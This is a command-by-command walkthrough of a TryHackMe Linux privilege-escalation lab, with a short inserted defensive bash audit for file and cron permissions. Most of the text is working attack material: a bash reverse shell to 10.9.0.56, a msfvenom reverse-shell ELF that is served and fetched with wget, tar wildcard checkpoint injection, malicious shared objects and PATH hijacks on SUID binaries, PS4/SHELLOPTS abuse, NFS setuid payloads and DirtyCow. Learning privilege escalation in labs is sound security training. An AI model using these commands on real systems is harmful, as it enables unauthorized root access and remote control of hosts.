Linux Privilege Escalation from tryhackme

1. Service Exploits

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root

2. Weak File Permissions (Readable /etc/shadow file)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

3. Weak File Permissions (Writable /etc/shadow file)

sudo mkpasswd -m sha-512 newpass123

4. Weak File Permissions (Writable /etc/passwd file)

5. Sudo shell escape sequences

sudo -l

6. cron jobs — File Permissions

cat /etc/crontab
locate overwrite.sh
ls -l /usr/local/bin/overwrite.sh
bash -i >& /dev/tcp/10.9.0.56/5566 0>&1

7. cron jobs — PATH Environment Variables

cd /home/user
cat > overwrite.sh << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
EOF
chmod +x /home/user/overwrite.sh
/tmp/rootbash -p
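
A defender-side counterpart to the file-permission and cron sections above (2 through 7), added here and not part of the TryHackMe room or its tooling: a bash audit that checks the "other" permission bits on /etc/shadow and /etc/passwd and walks an /etc/crontab-style file for root-run scripts anyone can overwrite and for world-writable directories on the crontab's PATH. It assumes GNU coreutils stat and bash 4+; the file names used when testing it are constructed fixtures.

```bash
#!/usr/bin/env bash
# Defender-side audit for the weak-permission cases above (added example, not
# part of the TryHackMe room). Assumes GNU coreutils stat and bash 4+.
# Return 0 when the "other" bit named in $2 (r or w) is clear on $1;
# otherwise write a finding to stderr and return 1.
check_other_bit() {
  local f="$1" bit="$2" mode digit mask word
  mode=$(stat -c '%a' "$f") || return 1
  digit=${mode: -1}                        # the "other" octal digit
  case "$bit" in
    r) mask=4; word=readable ;;
    w) mask=2; word=writable ;;
    *) return 2 ;;
  esac
  if (( digit & mask )); then
    echo "FINDING: $f is world-$word (mode $mode)" >&2
    return 1
  fi
}

# Parse an /etc/crontab-style file and print the number of findings: scripts
# root will run that anyone may overwrite (the overwrite.sh case) and
# world-writable directories on the crontab's own PATH (the PATH case).
check_crontab() {
  local crontab="$1" findings=0 line cmd dir dirs f
  while IFS= read -r line; do
    [[ $line =~ ^[[:space:]]*(#|$) ]] && continue
    if [[ $line =~ ^[[:space:]]*PATH=(.*) ]]; then
      IFS=: read -ra dirs <<< "${BASH_REMATCH[1]}"
      for dir in "${dirs[@]}"; do
        [ -d "$dir" ] && ! check_other_bit "$dir" w && findings=$((findings+1))
      done
      continue
    fi
    [[ $line =~ ^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*= ]] && continue  # MAILTO= etc.
    read -ra f <<< "$line"                 # split into cron fields, no globbing
    if [[ ${f[0]} == @* ]]; then cmd=${f[2]:-}; else cmd=${f[6]:-}; fi
    [[ $cmd == /* && -f $cmd ]] || continue
    check_other_bit "$cmd" w || findings=$((findings+1))
  done < "$crontab"
  echo "$findings"
}
# Live host: bash audit.sh --run
audit_host() {
  check_other_bit /etc/shadow r; check_other_bit /etc/shadow w
  check_other_bit /etc/passwd w
  echo "crontab findings: $(check_crontab /etc/crontab)"
}
if [ "${1:-}" = --run ]; then audit_host; fi
```

Each finding maps to one of the sections above: a readable shadow file, a writable shadow or passwd file, a writable cron script, or a writable directory ahead of the real binaries on the cron PATH.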

8. cron jobs — Wildcards

tar czf /tmp/backup.tar.gz *
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
msfvenom -l payloads | grep linux
user@debian:~$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
msfvenom --list formats
sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.56 LPORT=5555 -f elf -o shell.elf
sudo python3 -m http.server 9999
wget http://10.9.0.56:9999/shell.elf
nc -nlvp 5555
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

9. SUID/SGID Executables Known Exploits

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

10. SUID/SGID Shared Objects Injection

lse.sh -l 1 -i | more
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
mkdir .config
cd .config
cat > libcalc.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("/bin/bash -p");
}
EOF
Compile the .c file to create the .so file:
gcc -shared -fPIC -o libcalc.so libcalc.c
/usr/local/bin/suid-so

SUID/SGID Environment Variables

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strings /usr/local/bin/suid-env
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
cat > service.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -o service service.c
PATH=.:$PATH /usr/local/bin/suid-env

Abusing Shell Features (Vulnerable shell that allows forward slashes in function name)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/local/bin/suid-env2
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/sh --version
function /usr/sbin/service { "/bin/sh" -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2

Abusing Shell Features (Vulnerable shell that displays prompt through a variable in debug mode)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/bash --version
env -i SHELLOPTS=xtrace PS4=test /usr/local/bin/suid-env2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p

History Files

cat ~/.*history | less
su root

Password stored in Config Files

SSH Keys stored insecurely

ls -al /
ls -l /.ssh
cat /.ssh/root_key
vi root_key
chmod 600 root_key
ssh -i root_key root@10.10.121.113

Abusing NFS Vulnerability

./lse.sh -l 1 
showmount -e <victim ip>
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.41.239:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
/tmp/shell.elf

Kernel Exploits

perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
/usr/bin/passwd
mv /tmp/bak /usr/bin/passwd
exit
